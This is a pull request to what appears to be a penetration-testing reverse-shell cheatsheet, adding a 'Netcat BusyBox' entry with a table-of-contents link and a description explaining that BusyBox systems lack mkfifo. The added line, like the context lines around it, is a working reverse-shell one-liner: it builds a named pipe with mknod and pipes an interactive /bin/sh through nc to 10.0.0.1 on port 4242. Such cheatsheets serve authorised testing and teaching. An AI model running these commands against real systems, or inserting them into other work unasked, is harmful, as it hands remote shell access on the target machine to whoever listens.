### PR TITLE
Added Netcat BusyBox

### DIFF
--- a/Methodology and Resources/Reverse Shell Cheatsheet.md
+++ b/Methodology and Resources/Reverse Shell Cheatsheet.md
@@ -17,6 +17,7 @@
     * [Lua](#lua)
     * [Ncat](#ncat)
     * [Netcat OpenBsd](#netcat-openbsd)
+    * [Netcat BusyBox](#netcat-busybox)
     * [Netcat Traditional](#netcat-traditional)
     * [NodeJS](#nodejs)
     * [OpenSSL](#openssl)
@@ -155,6 +156,12 @@ nc -c bash 10.0.0.1 4242
 
 ```bash
 rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
+```
+
+### Netcat BusyBox
+
+```bash
+rm /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 4242 >/tmp/f
 ```
 
 ### Ncat


### PR DESCRIPTION
Some embedded systems like busybox won't have mkfifo present; instead, they will have mknod. This updated code can spawn reverse shell in systems that use mknod instead of mkfifo.